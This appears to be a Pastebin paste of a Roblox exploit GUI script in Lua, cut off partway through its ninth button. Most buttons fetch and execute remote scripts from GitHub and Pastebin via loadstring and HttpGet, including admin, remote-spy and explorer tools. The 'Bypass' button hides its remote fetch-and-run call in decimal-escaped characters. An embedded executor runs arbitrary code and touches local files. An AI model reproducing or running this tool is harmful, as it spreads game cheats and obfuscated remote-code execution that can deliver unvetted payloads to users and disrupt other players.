Advertisement
mikeygaylol

k00pgui

Feb 12th, 2024
934
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 34.39 KB | None | 0 0
  1. --[[
  2. WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
  3. ]]
  4. -- Gui to Lua
  5. -- Version: 1.0
  6. -- Gui Name: k00p Gui
  7. -- Game:
  8.  
  9. game.StarterGui:SetCore("SendNotification", {
  10. Title = "k00p GUI v1";
  11. Text = "Script made by ItMeJinxx"; -- what the text says (ofc)
  12. Duration = 10;
  13. })
  14.  
  15. -- Instances:
  16.  
  17. local ScreenGui = Instance.new("ScreenGui")
  18. local Main = Instance.new("Frame")
  19. local TextLabel = Instance.new("TextLabel")
  20. local TextButton = Instance.new("TextButton")
  21. local TextButton_2 = Instance.new("TextButton")
  22. local TextButton_3 = Instance.new("TextButton")
  23. local TextButton_4 = Instance.new("TextButton")
  24. local TextButton_5 = Instance.new("TextButton")
  25. local TextButton_6 = Instance.new("TextButton")
  26. local TextButton_7 = Instance.new("TextButton")
  27. local TextButton_8 = Instance.new("TextButton")
  28. local TextButton_9 = Instance.new("TextButton")
  29. local TextButton_10 = Instance.new("TextButton")
  30. local TextButton_11 = Instance.new("TextButton")
  31. local TextButton_12 = Instance.new("TextButton")
  32. local TextButton_13 = Instance.new("TextButton")
  33. local TextButton_14 = Instance.new("TextButton")
  34. local TextButton_15 = Instance.new("TextButton")
  35. local TextButton_16 = Instance.new("TextButton")
  36. local TextLabel_2 = Instance.new("TextLabel")
  37.  
  38. --Properties:
  39.  
  40. ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  41. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  42.  
  43. Main.Name = "Main"
  44. Main.Parent = ScreenGui
  45. Main.BackgroundColor3 = Color3.fromRGB(11, 11, 11)
  46. Main.BorderColor3 = Color3.fromRGB(255, 255, 255)
  47. Main.BorderSizePixel = 5
  48. Main.Position = UDim2.new(0.21171169, 0, 0.181818172, 0)
  49. Main.Size = UDim2.new(0, 383, 0, 237)
  50. Main.Active = true
  51. Main.Draggable = true
  52.  
  53. TextLabel.Parent = Main
  54. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  55. TextLabel.BorderSizePixel = 4
  56. TextLabel.Position = UDim2.new(-0.0652741492, 0, 0, 0)
  57. TextLabel.Size = UDim2.new(0, 429, 0, 41)
  58. TextLabel.Font = Enum.Font.PatrickHand
  59. TextLabel.Text = "k00p GUI 1v"
  60. TextLabel.TextColor3 = Color3.fromRGB(225, 0, 3)
  61. TextLabel.TextScaled = true
  62. TextLabel.TextSize = 14.000
  63. TextLabel.TextWrapped = true
  64.  
  65. TextButton.Parent = Main
  66. TextButton.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  67. TextButton.BorderSizePixel = 3
  68. TextButton.Position = UDim2.new(0.0208877288, 0, 0.23206751, 0)
  69. TextButton.Size = UDim2.new(0, 68, 0, 30)
  70. TextButton.Font = Enum.Font.PatrickHand
  71. TextButton.Text = "RC7"
  72. TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
  73. TextButton.TextScaled = true
  74. TextButton.TextSize = 14.000
  75. TextButton.TextWrapped = true
  76. TextButton.MouseButton1Down:connect(function()
  77. if game.CoreGui:FindFirstChild("RC7LOLOL") then
  78. game.CoreGui:FindFirstChild("RC7LOLOL"):Destroy()
  79. end
  80. local Screen = game:GetObjects("rbxassetid://14625538289")[1]
  81. Screen.Parent = game.CoreGui
  82. local RC7 = Screen.RC7
  83. local Explorer = Screen.Explorer
  84. local Save = Screen.Save
  85. local Open = Screen.Open
  86. local CurrentTab = "1"
  87. local Buttonz = RC7.Buttons
  88. local NewestTab = 1
  89. if not isfolder("RC7Scripts") then
  90. makefolder("RC7Scripts")
  91. end
  92.  
  93. Explorer.Visible = false
  94. Open.Visible = false
  95. Save.Visible = false
  96. RC7.Draggable = true
  97. Open.Draggable = true
  98. Open.Active = true
  99. RC7.Active = true
  100.  
  101. for i,v in next, listfiles("RC7Scripts") do
  102. local a = Explorer.Buttons.Yes:Clone()
  103. a.Parent = Explorer.Buttons
  104. a.Visible = true
  105. a.Text = v
  106. a.Name = v
  107. a.MouseButton1Click:Connect(function()
  108. pcall(function()
  109. RC7.TabTexts:FindFirstChild(CurrentTab):FindFirstChild(CurrentTab).Text = readfile(listfiles("RC7Scripts")[i])
  110. end)
  111. Explorer.Visible = false
  112. end)
  113. end
  114.  
  115. Save.save.MouseButton1Click:Connect(function()
  116. writefile("RC7Scripts/" .. tostring(Save.name.Text) .. ".lua", tostring(RC7.TabTexts:FindFirstChild(CurrentTab):FindFirstChild(CurrentTab).Text))
  117. Save.Visible = false
  118. end)
  119.  
  120. Buttonz.Execute.MouseButton1Click:Connect(function()
  121. local success, result = pcall(function()
  122. assert(loadstring(RC7.TabTexts[CurrentTab][CurrentTab].Text))()
  123. end)
  124.  
  125. if not success then
  126. local Error = RC7.Console.Error:Clone()
  127. Error.Text = result
  128. Error.Parent = RC7.Console
  129. Error.Visible = true
  130. end
  131. end)
  132.  
  133. Buttonz.Open.MouseButton1Click:Connect(function()
  134. Explorer.Visible = true
  135. end)
  136.  
  137. Explorer.Exit.MouseButton1Click:Connect(function()
  138. Explorer.Visible = false
  139. end)
  140.  
  141. Buttonz.Clear.MouseButton1Click:Connect(function()
  142. RC7.TabTexts:FindFirstChild(CurrentTab):FindFirstChild(CurrentTab).Text = ""
  143. end)
  144.  
  145. Buttonz.Inf.MouseButton1Click:Connect(function()
  146. loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))()
  147. end)
  148.  
  149. Buttonz.Save.MouseButton1Click:Connect(function()
  150. Save.Visible = true
  151. end)
  152.  
  153. Save.Close.MouseButton1Click:Connect(function()
  154. Save.Visible = false
  155. end)
  156.  
  157. Buttonz.Idk.MouseButton1Click:Connect(function()
  158. loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua"))()
  159. end)
  160.  
  161. Buttonz.Dex.MouseButton1Click:Connect(function()
  162. loadstring(game:HttpGet("https://raw.githubusercontent.com/infyiff/backup/main/dex.lua"))()
  163. end)
  164.  
  165. Buttonz.Attach.MouseButton1Click:Connect(function()
  166. if messagebox then
  167. wait(2)
  168. messagebox("RC7", "Attached", 0)
  169. end
  170. end)
  171.  
  172. RC7.Tabs:FindFirstChild(1).MouseButton1Click:Connect(function()
  173. CurrentTab = "1"
  174. for i,v in next, RC7.TabTexts:GetChildren() do
  175. if v.Name == "1" then
  176. v.Visible = true
  177. else
  178. v.Visible = false
  179. end
  180. end
  181. end)
  182.  
  183. local function ANewTab()
  184. local Tab = RC7.Tabs:FindFirstChild(1):Clone()
  185. NewestTab = NewestTab + 1
  186. Tab.Parent = RC7.Tabs
  187. Tab.Name = tostring(NewestTab)
  188. Tab.Text = "(" .. Tab.Name .. ").lua"
  189. local TextBoxClone = RC7.TabTexts:FindFirstChild(1):Clone()
  190. TextBoxClone.Parent = RC7.TabTexts
  191. TextBoxClone.Name = NewestTab
  192. TextBoxClone:FindFirstChild(1).Name = NewestTab
  193. TextBoxClone[NewestTab].Text = ""
  194. Tab.MouseButton1Click:Connect(function()
  195. CurrentTab = Tab.Name
  196. for i,v in next, RC7.TabTexts:GetChildren() do
  197. if v.Name == Tab.Name then
  198. v.Visible = true
  199. else
  200. v.Visible = false
  201. end
  202. end
  203. end)
  204. end
  205.  
  206. RC7.Top.Frame.Close.MouseButton1Click:Connect(function()
  207. Open.Visible = true
  208. RC7.Visible = false
  209. end)
  210.  
  211. RC7.Tabs.AddNewTab.MouseButton1Click:Connect(function()
  212. ANewTab()
  213. RC7.Tabs.AddNewTab.Parent = RC7
  214. wait()
  215. RC7.AddNewTab.Parent = RC7.Tabs
  216. end)
  217.  
  218.  
  219. Open.MouseButton1Click:Connect(function()
  220. Open.Visible = false
  221. RC7.Visible = true
  222. end)
  223.  
  224. RC7.TabTexts:FindFirstChild(CurrentTab):FindFirstChild(CurrentTab).Text = ""
  225. end)
  226. TextButton_2.Parent = Main
  227. TextButton_2.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  228. TextButton_2.BorderSizePixel = 3
  229. TextButton_2.Position = UDim2.new(0.263707578, 0, 0.23206751, 0)
  230. TextButton_2.Size = UDim2.new(0, 68, 0, 30)
  231. TextButton_2.Font = Enum.Font.PatrickHand
  232. TextButton_2.Text = "Ghosthub"
  233. TextButton_2.TextColor3 = Color3.fromRGB(0, 0, 0)
  234. TextButton_2.TextScaled = true
  235. TextButton_2.TextSize = 14.000
  236. TextButton_2.TextWrapped = true
  237. TextButton_2.MouseButton1Down:connect(function()
  238. loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/GhostHub'))()
  239. end)
  240. TextButton_3.Parent = Main
  241. TextButton_3.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  242. TextButton_3.BorderSizePixel = 3
  243. TextButton_3.Position = UDim2.new(0.498694509, 0, 0.23206751, 0)
  244. TextButton_3.Size = UDim2.new(0, 68, 0, 30)
  245. TextButton_3.Font = Enum.Font.PatrickHand
  246. TextButton_3.Text = "Bypass"
  247. TextButton_3.TextColor3 = Color3.fromRGB(0, 0, 0)
  248. TextButton_3.TextScaled = true
  249. TextButton_3.TextSize = 14.000
  250. TextButton_3.TextWrapped = true
  251. TextButton_3.MouseButton1Down:connect(function()
  252. loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\103\48\48\108\88\112\108\111\105\116\101\114\47\103\48\48\108\88\112\108\111\105\116\101\114\47\109\97\105\110\47\70\101\37\50\48\98\121\112\97\115\115\34\44\32\116\114\117\101\41\41\40\41\10")()
  253. end)
  254. TextButton_4.Parent = Main
  255. TextButton_4.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  256. TextButton_4.BorderSizePixel = 3
  257. TextButton_4.Position = UDim2.new(0.736292422, 0, 0.23206751, 0)
  258. TextButton_4.Size = UDim2.new(0, 68, 0, 30)
  259. TextButton_4.Font = Enum.Font.PatrickHand
  260. TextButton_4.Text = "K00P hub"
  261. TextButton_4.TextColor3 = Color3.fromRGB(0, 0, 0)
  262. TextButton_4.TextScaled = true
  263. TextButton_4.TextSize = 14.000
  264. TextButton_4.TextWrapped = true
  265. TextButton_4.MouseButton1Down:connect(function()
  266. loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/JinxxHub'))()
  267. end)
  268. TextButton_5.Parent = Main
  269. TextButton_5.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  270. TextButton_5.BorderSizePixel = 3
  271. TextButton_5.Position = UDim2.new(0.736292422, 0, 0.434599161, 0)
  272. TextButton_5.Size = UDim2.new(0, 68, 0, 30)
  273. TextButton_5.Font = Enum.Font.PatrickHand
  274. TextButton_5.Text = "scythe"
  275. TextButton_5.TextColor3 = Color3.fromRGB(0, 0, 0)
  276. TextButton_5.TextScaled = true
  277. TextButton_5.TextSize = 14.000
  278. TextButton_5.TextWrapped = true
  279. TextButton_5.MouseButton1Down:connect(function()
  280. --tribal scythe made by jarredbcv, ideas from masterepico
  281. local player = game.Players.LocalPlayer
  282. local pchar = player.Character
  283. local mouse = player:GetMouse()
  284. local torso=pchar.Torso
  285. anim=true
  286. anglespeed = 1
  287. angle = 0
  288. maxrage = 9001
  289. rage = 9001 -- ITS OVER 9000!
  290. local asin = math.asin
  291. local atan2 = math.atan2
  292. local rad = math.rad
  293. local sin = math.sin
  294. local abs = math.abs
  295. local ceil = math.ceil
  296. local pi = math.pi
  297. deddeb=false
  298. deb=false
  299. Part = function(x,y,z,color,tr,cc,an,parent)
  300. local p = Instance.new('Part',parent or Weapon)
  301. p.formFactor = 'Custom'
  302. p.Size = Vector3.new(x,y,z)
  303. p.BrickColor = BrickColor.new(color)
  304. p.CanCollide = cc
  305. p.Transparency = tr
  306. p.Anchored = an
  307. p.TopSurface,p.BottomSurface = 0,0
  308. return p
  309. end
  310. Weld = function(p0,p1,x,y,z,rx,ry,rz,par)
  311. p0.Position = p1.Position
  312. local w = Instance.new('Motor',par or p0)
  313. w.Part0 = p0
  314. w.Part1 = p1
  315. w.C1 = CFrame.new(x,y,z)*CFrame.Angles(rx,ry,rz)
  316. return w
  317. end
  318. Mesh = function(par,num,x,y,z)
  319. local msh = nil
  320. if num == 1 then
  321. msh = Instance.new("CylinderMesh",par)
  322. elseif num == 2 then
  323. msh = Instance.new("SpecialMesh",par)
  324. msh.MeshType = 3
  325. elseif num == 3 then
  326. msh = Instance.new("BlockMesh",par)
  327. elseif num == 4 then
  328. msh = Instance.new("SpecialMesh",par)
  329. msh.MeshType = "Wedge"
  330. elseif type(num) == 'string' then
  331. msh = Instance.new("SpecialMesh",par)
  332. msh.MeshId = num
  333. end
  334. msh.Scale = Vector3.new(x,y,z)
  335. return msh
  336. end
  337. so = function(id,par,lo,pi)
  338. s = Instance.new("Sound",par) s.Looped=lo s.Pitch=pi
  339. s.SoundId = "http://roblox.com/asset/?id="..id s:play()
  340. end
  341. ROW = function(x, pa, out, col, trans, s, wt, t, ang, plus)
  342. for i = 1, 360, 360/t do wait()
  343. local c = Instance.new("Part", pa)
  344. c.FormFactor = 3
  345. c.TopSurface = 0
  346. c.BottomSurface = 0
  347. c.Size = s
  348. c.Anchored = true
  349. c.CanCollide = wt
  350. c.Transparency = trans
  351. c.BrickColor = BrickColor.new(col)
  352. c.CFrame = x * CFrame.Angles(0, math.rad(i + plus), 0) * CFrame.new(0, 0, out) * ang
  353. end
  354. end
  355. Lightning = function(Start,End,Times,Offset,Color,Thickness,Transparency)
  356. local magz = (Start - End).magnitude local curpos = Start local trz = {-Offset,Offset}
  357. for i=1,Times do
  358. local li = Instance.new("Part",workspace) li.TopSurface =0 li.BottomSurface = 0 li.Anchored = true li.Transparency = Transparency or 0.4 li.BrickColor = BrickColor.new(Color)
  359. li.formFactor = "Custom" li.CanCollide = false li.Size = Vector3.new(Thickness,Thickness,magz/Times) local ofz = Vector3.new(trz[math.random(1,2)],trz[math.random(1,2)],trz[math.random(1,2)])
  360. local trolpos = CFrame.new(curpos,End)*CFrame.new(0,0,magz/Times).p+ofz
  361. if Times == i then
  362. local magz2 = (curpos - End).magnitude li.Size = Vector3.new(Thickness,Thickness,magz2)
  363. li.CFrame = CFrame.new(curpos,End)*CFrame.new(0,0,-magz2/2)
  364. else
  365. li.CFrame = CFrame.new(curpos,trolpos)*CFrame.new(0,0,magz/Times/2)
  366. end
  367. curpos = li.CFrame*CFrame.new(0,0,magz/Times/2).p game.Debris:AddItem(li,0.01)
  368. end
  369. end
  370.  
  371. local function getAngles(cf)
  372. local sx,sy,sz,m00,m01,m02,m10,m11,m12,m20,m21,m22 = cf:components()
  373. return atan2(-m12,m22),asin(m02),atan2(-m01,m00)
  374. end
  375. Lerp = {
  376. Number = function(C1,C2,inc)
  377. return C1 + (C2 - C1) * inc
  378. end;
  379. CFrame = function(C1,C2,inc)
  380. local x1,y1,z1 = getAngles(C1)
  381. local x2,y2,z2 = getAngles(C2)
  382. return CFrame.new(
  383. Lerp.Number(C1.X,C2.X,inc),
  384. Lerp.Number(C1.Y,C2.Y,inc),
  385. Lerp.Number(C1.Z,C2.Z,inc)
  386. ) * CFrame.Angles(
  387. Lerp.Number(x1,x2,inc),
  388. Lerp.Number(y1,y2,inc),
  389. Lerp.Number(z1,z2,inc)
  390. )
  391. end;
  392. }
  393. local function genWeld(a,b)
  394. local w = Instance.new("Weld",a)
  395. w.Part0 = a
  396. w.Part1 = b
  397. return w
  398. end
  399. local Neck = genWeld(pchar.Torso,pchar.Head)
  400. Neck.C0 = CFrame.new(0,1,0)
  401. Neck.C1 = CFrame.new(0,-0.5,0)
  402. local LeftShoulder = genWeld(pchar.Torso,pchar['Left Arm'])
  403. LeftShoulder.C0 = CFrame.new(-1,0.5,0)
  404. LeftShoulder.C1 = CFrame.new(0.5,0.5,0)
  405. RightShoulder = genWeld(pchar.Torso,pchar['Right Arm'])
  406. RightShoulder.C0 = CFrame.new(1,0.5,0)
  407. RightShoulder.C1 = CFrame.new(-0.5,0.5,0)
  408. local LeftHip = genWeld(pchar.Torso,pchar['Left Leg'])
  409. LeftHip.C0 = CFrame.new(-1,-1,0)
  410. LeftHip.C1 = CFrame.new(-0.5,1,0)
  411. local RightHip = genWeld(pchar.Torso,pchar['Right Leg'])
  412. RightHip.C0 = CFrame.new(1,-1,0)
  413. RightHip.C1 = CFrame.new(0.5,1,0)
  414. local RootJoint = genWeld(pchar.HumanoidRootPart,pchar.Torso)
  415. RootJoint.C0 = CFrame.new(0,0,0) * CFrame.Angles(-math.pi/2,0,math.pi)
  416. RootJoint.C1 = CFrame.new(0,0,0) * CFrame.Angles(-math.pi/2,0,math.pi)
  417. local function newLerpTo(weld)
  418. return {
  419. Weld = weld; -- The weld that will lerp
  420. To = weld.C0; -- Where it will lerp to; a CFrame
  421. Cache = weld.C0; -- Cache of original position; it helps when making anim keyframes
  422. Speed = 0.1; -- Speed of lerp. 0.1 or 0.2 is best
  423. }
  424. end
  425. LerpTo = {
  426. Neck = newLerpTo(Neck);
  427. LeftArm = newLerpTo(LeftShoulder);
  428. RightArm = newLerpTo(RightShoulder);
  429. LeftLeg = newLerpTo(LeftHip);
  430. RightLeg = newLerpTo(RightHip);
  431. RootJoint = newLerpTo(RootJoint);
  432. }
  433. -- gui
  434. sc = Instance.new("ScreenGui",player.PlayerGui)
  435. sc.Name = "RaigMeter"
  436. fr = Instance.new("Frame",sc)
  437. fr.Size = UDim2.new(0, 250, 0, 28)
  438. fr.Position = UDim2.new(0.75, 0, .95, 0)
  439. fr.BackgroundColor3 = Color3.new(0.8, 0.8, 0.8)
  440. met = Instance.new("Frame", fr)
  441. met.Size = UDim2.new(1, -10, 1, -6)
  442. met.Position = UDim2.new(0, 5, 0, 3)
  443. met.BackgroundColor3 = Color3.new(0, 0, 0)
  444. met.BorderSizePixel = 0
  445. metr = Instance.new("ImageLabel", met)
  446. metr.Size = UDim2.new(rage/maxrage, 0, 1, -2)
  447. metr.Position = UDim2.new(0, 0, 0, 1)
  448. metr.Image = "http://www.roblox.com/asset/?id=112941056"
  449. metr.BorderSizePixel = 0
  450. metr.BackgroundColor3 = Color3.new(0,0,0)
  451. tx = Instance.new("TextLabel", met)
  452. tx.Size = UDim2.new(0, 0, 1, 0)
  453. tx.Position = UDim2.new(0, 5, 0, 0)
  454. tx.Text = rage.." / "..maxrage
  455. tx.Font = "ArialBold"
  456. tx.FontSize = "Size18"
  457. tx.BackgroundTransparency = 1
  458. tx.TextColor3 = BrickColor.new("Deep orange").Color
  459. tx.TextXAlignment = "Left"
  460. laast = rage
  461. -- func
  462. function click()
  463. if deb==true then return end
  464. deb=true
  465. anim=false
  466. ded= Part(.5,0,2,'White',1,false,false,mo)
  467. dedwl= Weld(ded,rot,0,0,0,0,0,0,mo)
  468. ded.Touched:connect(function(hit)
  469. if deddeb==true then return end
  470. if hit.Parent:findFirstChild("Humanoid") ~= nil and hit.Parent:findFirstChild("Humanoid").Health >= 1 then
  471. deddeb=true
  472. local hed=hit.Parent.Head:Clone()
  473. hed.Parent=workspace
  474. hed.CFrame=hit.Parent.Head.CFrame
  475. hit.Parent.Head:Destroy()
  476. wait(1)
  477. game.Debris:AddItem(hed,10)
  478. deddeb=false
  479. end
  480. end)
  481. so('10209645',torso,false,.75)
  482. LerpTo.Neck.To = LerpTo.Neck.Cache * CFrame.Angles(0,-rad(20),0)
  483. LerpTo.RightArm.To = LerpTo.RightArm.Cache * CFrame.Angles(rad(60),0,0)
  484. LerpTo.LeftArm.To = LerpTo.LeftArm.Cache * CFrame.Angles(-rad(5),0,0)
  485. LerpTo.RightLeg.To = LerpTo.RightLeg.Cache * CFrame.Angles(rad(10),0,0)
  486. LerpTo.LeftLeg.To = LerpTo.LeftLeg.Cache * CFrame.Angles(-rad(10),0,0)
  487. wait(.1)
  488. LerpTo.Neck.To = LerpTo.Neck.Cache * CFrame.Angles(0,rad(20),0)
  489. LerpTo.RightArm.To = LerpTo.RightArm.Cache * CFrame.Angles(rad(60),0,-rad(60))
  490. LerpTo.LeftArm.To = LerpTo.LeftArm.Cache * CFrame.Angles(rad(5),0,0)
  491. LerpTo.RightLeg.To = LerpTo.RightLeg.Cache * CFrame.Angles(-rad(10),0,0)
  492. LerpTo.LeftLeg.To = LerpTo.LeftLeg.Cache * CFrame.Angles(rad(10),0,0)
  493. wait(.2)
  494. LerpTo.Neck.To = LerpTo.Neck.Cache * CFrame.Angles(0,-rad(20),0)
  495. LerpTo.RightArm.To = LerpTo.RightArm.Cache * CFrame.Angles(rad(80),rad(20),rad(100))
  496. LerpTo.LeftArm.To = LerpTo.LeftArm.Cache * CFrame.Angles(rad(5),0,0)
  497. LerpTo.RightLeg.To = LerpTo.RightLeg.Cache * CFrame.Angles(-rad(10),0,0)
  498. LerpTo.LeftLeg.To = LerpTo.LeftLeg.Cache * CFrame.Angles(rad(10),0,0)
  499. so('28144425',torso,false,1)
  500. wait(.3)
  501. ded:Destroy()
  502. wait(.25)
  503. anim=true
  504. wait(.75)
  505. deb=false
  506. end
  507.  
  508.  
  509. --keys
  510. mouse.Button1Down:connect(function() click(mouse) end)
  511. mouse.KeyDown:connect(function(k)
  512. if k == "q" then
  513. end
  514. end)
  515. --parts
  516. mo=Instance.new("Model",pchar)
  517. mpa= Part(1,1,1,'Earth green',0,false,false,mo)
  518. Mesh(mpa,1,.3,6,.3)
  519. mwl= Weld(mpa,pchar["Right Arm"],0,-1.1,0,-pi/2,pi/1,-pi/3.5,mo)
  520. pa= Part(1,1,1,'Brown',0,false,false,mo)
  521. Mesh(pa,3,.301,6,.1)
  522. wl= Weld(pa,mpa,0,0,0,0,0,0,mo)
  523. pa= Part(1,1,1,'Brown',0,false,false,mo)
  524. Mesh(pa,3,.301,6,.1)
  525. wl= Weld(pa,mpa,0,0,0,0,pi/2,0,mo)
  526. for i=1,7 do
  527. pa= Part(1,1,1,'Black',0,false,false,mo)
  528. Mesh(pa,1,.301,.2,.301)
  529. wl= Weld(pa,mpa,0,-4+i,0,0,0,0,mo)
  530. end
  531. -- blade
  532. cl= Part(1,1,1,'Deep orange',0,false,false,mo)
  533. Mesh(cl,3,.1,.5,.5)
  534. clwl= Weld(cl,mpa,0,3,0,0,0,0,mo)
  535. pa= Part(1,1,1,'Deep orange',0,false,false,mo)
  536. Mesh(pa,4,.1,.5,1)
  537. wl= Weld(pa,cl,0,0,.75,0,pi/1,0,mo)
  538. bla= Part(1,1,1,'Deep orange',0,false,false,mo)
  539. Mesh(bla,4,.1,.5,1)
  540. wl= Weld(bla,cl,0,-.585,1.7,rad(10),pi/1,0,mo)
  541. pa= Part(1,1,1,'Deep orange',0,false,false,mo)
  542. Mesh(pa,4,.1,.5,1)
  543. wl= Weld(pa,cl,0,-1.298,2.5,rad(20),pi/1,0,mo)
  544. pa= Part(1,1,1,'Deep orange',0,false,false,mo)
  545. Mesh(pa,3,.1,.3,1)
  546. wl= Weld(pa,cl,0,-.4,.75,0,pi/1,0,mo)
  547. pa= Part(1,1,1,'Deep orange',0,false,false,mo)
  548. Mesh(pa,3,.1,.3,.5)
  549. wl= Weld(pa,bla,0,-.4,-.2,0,0,0,mo)
  550. pa= Part(1,1,1,'Black',0,false,false,mo)
  551. Mesh(pa,3,.09,.2,.9)
  552. wl= Weld(pa,cl,0,-.65,.75,0,pi/1,0,mo)
  553. pa= Part(1,1,1,'Black',0,false,false,mo)
  554. Mesh(pa,4,.1,.3,.5)
  555. wl= Weld(pa,bla,0,-.4,.3,0,pi/1,pi/1,mo)
  556. pa= Part(1,1,1,'Black',0,false,false,mo)
  557. Mesh(pa,4,.09,.175,.55)
  558. wl= Weld(pa,bla,0,-.63,-.2,0,pi/1,pi/1,mo)
  559. rot= Part(1,1,1,'Really black',0,false,false,mo)
  560. Mesh(rot,1,.5,.09,.5)
  561. pawl= Weld(rot,cl,0,0,-.25,0,0,pi/2,mo)
  562. pa= Part(.1,.1,.1,'Black',0,false,false,mo)
  563. Mesh(pa,'http://www.roblox.com/Asset/?id=9756362',.2,.75,.2)
  564. pawl= Weld(pa,rot,0,0,-.75,pi/2,0,0,mo)
  565. pa= Part(.1,.1,.1,'Black',0,false,false,mo)
  566. Mesh(pa,'http://www.roblox.com/Asset/?id=9756362',.2,.75,.2)
  567. pawl= Weld(pa,rot,.5,0,-.5,pi/2,0,pi/3,mo)
  568.  
  569. local function updateanims()
  570. if anim==true then
  571. if Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude < 2 then
  572. anglespeed = 1/3
  573. LerpTo.Neck.To = LerpTo.Neck.Cache * CFrame.Angles(sin(angle)*0.05,0,0)
  574. LerpTo.RightArm.To = LerpTo.RightArm.Cache * CFrame.Angles(rad(150),-rad(15)+abs(sin(angle))*0.1,rad(30))
  575. LerpTo.LeftArm.To = LerpTo.LeftArm.Cache * CFrame.Angles(sin(angle)*0.1,0,0)
  576. LerpTo.RightLeg.To = LerpTo.RightLeg.Cache * CFrame.Angles(0,0,abs(sin(angle))*0.1)
  577. LerpTo.LeftLeg.To = LerpTo.LeftLeg.Cache * CFrame.Angles(0,0,-abs(sin(angle))*0.1)
  578. end
  579. if Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude > 2 then
  580. anglespeed = 4
  581. LerpTo.Neck.To = LerpTo.Neck.Cache * CFrame.Angles(0,0,math.sin(angle)*0.05)
  582. LerpTo.RightArm.To = LerpTo.RightArm.Cache * CFrame.Angles(rad(80),rad(20),0)
  583. LerpTo.LeftArm.To = LerpTo.LeftArm.Cache * CFrame.Angles(rad(100),0,rad(20))
  584. LerpTo.RightLeg.To = LerpTo.RightLeg.Cache * CFrame.Angles(sin(angle)*.8,0,0)
  585. LerpTo.LeftLeg.To = LerpTo.LeftLeg.Cache * CFrame.Angles(-sin(angle)*.8,0,0)
  586. end
  587. end
  588. end
  589. local function onupdate()
  590. if rage > maxrage then rage=maxrage end
  591. tx.Text = ceil(rage).." / "..maxrage
  592. metr.Size = UDim2.new(ceil(rage)/maxrage, 0, 1, -2)
  593. end
  594.  
  595. Spawn(function()
  596. while wait()do
  597. angle = (angle % 100) + anglespeed/10 -- no matter whut it has to be in a loop or its on exticy
  598. end
  599. end)
  600. meo=0
  601. sdeb=false
  602. game:service'RunService'.RenderStepped:connect(function()
  603. meo=meo+1
  604. for _,v in pairs(LerpTo) do
  605. v.Weld.C0 = Lerp.CFrame(v.Weld.C0,v.To,v.Speed)end
  606. onupdate()
  607. updateanims()
  608. end)
  609. end)
  610. TextButton_6.Parent = Main
  611. TextButton_6.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  612. TextButton_6.BorderSizePixel = 3
  613. TextButton_6.Position = UDim2.new(0.498694509, 0, 0.434599161, 0)
  614. TextButton_6.Size = UDim2.new(0, 68, 0, 30)
  615. TextButton_6.Font = Enum.Font.PatrickHand
  616. TextButton_6.Text = "Resizer"
  617. TextButton_6.TextColor3 = Color3.fromRGB(0, 0, 0)
  618. TextButton_6.TextScaled = true
  619. TextButton_6.TextSize = 14.000
  620. TextButton_6.TextWrapped = true
  621. TextButton_6.MouseButton1Down:connect(function()
  622. loadstring(game:HttpGet('https://raw.githubusercontent.com/DigitalityScripts/roblox-scripts/main/Leg Resize'))()
  623. --r15
  624. end)
  625. TextButton_7.Parent = Main
  626. TextButton_7.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  627. TextButton_7.BorderSizePixel = 3
  628. TextButton_7.Position = UDim2.new(0.263707578, 0, 0.434599161, 0)
  629. TextButton_7.Size = UDim2.new(0, 68, 0, 30)
  630. TextButton_7.Font = Enum.Font.PatrickHand
  631. TextButton_7.Text = "Keyboard gui"
  632. TextButton_7.TextColor3 = Color3.fromRGB(0, 0, 0)
  633. TextButton_7.TextScaled = true
  634. TextButton_7.TextSize = 14.000
  635. TextButton_7.TextWrapped = true
  636. TextButton_7.MouseButton1Down:connect(function()
  637. loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))()
  638. end)
  639. TextButton_8.Parent = Main
  640. TextButton_8.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  641. TextButton_8.BorderSizePixel = 3
  642. TextButton_8.Position = UDim2.new(0.0208877325, 0, 0.434599161, 0)
  643. TextButton_8.Size = UDim2.new(0, 68, 0, 30)
  644. TextButton_8.Font = Enum.Font.PatrickHand
  645. TextButton_8.Text = "Chat Troll"
  646. TextButton_8.TextColor3 = Color3.fromRGB(0, 0, 0)
  647. TextButton_8.TextScaled = true
  648. TextButton_8.TextSize = 14.000
  649. TextButton_8.TextWrapped = true
  650. TextButton_8.MouseButton1Down:connect(function()
  651. loadstring(game:HttpGet("https://pastebin.com/raw/vUsHbiTR"))()
  652. end)
  653. TextButton_9.Parent = Main
  654. TextButton_9.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  655. TextButton_9.BorderSizePixel = 3
  656. TextButton_9.Position = UDim2.new(0.736292422, 0, 0.637130797, 0)
  657. TextButton_9.Size = UDim2.new(0, 68, 0, 30)
  658. TextButton_9.Font = Enum.Font.PatrickHand
  659. TextButton_9.Text = "Message"
  660. TextButton_9.TextColor3 = Color3.fromRGB(0, 0, 0)
  661. TextButton_9.TextScaled = true
  662. TextButton_9.TextSize = 14.000
  663. TextButton_9.TextWrapped = true
